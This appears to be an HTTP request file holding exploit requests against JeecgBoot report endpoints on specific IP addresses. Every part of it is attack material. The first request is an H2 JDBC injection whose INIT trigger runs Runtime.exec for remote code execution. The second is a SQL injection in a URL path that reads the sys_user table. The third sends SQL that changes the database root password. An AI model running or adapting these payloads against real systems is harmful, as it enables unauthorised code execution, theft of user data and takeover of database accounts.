
POST http://47.113.177.226:8083/jeecg-boot/jmreport/testConnection
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Host: 1.13.178.132:8085
Cmd: whoami
Content-Type: application/json
Content-Length: 8820


{
  "id": "1",
  "code": "dataSource1",
  "dbType": "H2",
  "dbDriver": "org.h2.Driver",
  "dbUrl": "jdbc:h2:mem:test;init=CREATE TRIGGER shell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('open -a calculator.app')\u000A$$",
  "dbName": "test",
  "dbUsername": "sa",
  "dbPassword": "",
  "connectTimes": 5
}
###
GET http://47.113.177.226:8083/jeecg-boot//sys/ng-
alain/getDictItemsByTable/'%20from%20sys_user/*,%20'/x.js
Content-Type: application/json

###

POST http://47.113.177.226:8083/jeecg-boot/jmreport/queryFieldBySql
Content-Type: application/json

{"sql":"ALTER USER 'root'@'localhost' IDENTIFIED BY 'newpassword';"}
###
